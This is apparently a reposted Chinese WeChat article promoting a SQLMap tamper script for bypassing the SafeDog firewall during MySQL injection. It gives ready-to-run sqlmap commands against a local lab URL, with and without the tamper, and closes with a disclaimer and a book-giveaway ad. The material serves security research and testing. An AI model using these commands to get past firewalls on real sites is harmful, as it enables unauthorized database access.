项目作者:Tas9er
项目地址:https://github.com/Tas9er/MySQLByPassForSafeDog
0x01 工具介绍
此Tamper仅仅适用于MySQL数据库,在SQLMap使用过程中添加参数--tamper=MySQLByPassForSafeDog。
0x02 安装与使用
1、安装网站安全狗Apache最新版
2、启用安全狗,不加MySQLByPassForSafeDog绕狗Tamper:
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql
3、启用安全狗,添加MySQLByPassForSafeDog绕狗Tamper:
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog
4、绕过POC
可以添加参数-v 3进行学习查看
python sqlmap.py -u "http://192.168.2.3:60001/sqli.php?id=1" --random-agent --dbms=mysql --tamper=MySQLByPassForSafeDog -v 3
0x03 下载地址
1、通过项目地址下载
0x04 声明
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。
推 荐 阅 读
加我微信:ivu123ivu,进送书活动群,不定时免费送书
《x64汇编语言:从新手到AVX专家》
从简单和基本的程序开始,一直讲到 AVX 编程。,专门针对Linux上的汇编,了解如何在Windows 上进行汇编。帮助读者快速掌握64 位汇编语言。
原文始发于微信公众号(web安全工具库):MySQL注入绕安全狗脚本 -- MySQLByPassForSafeDog
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论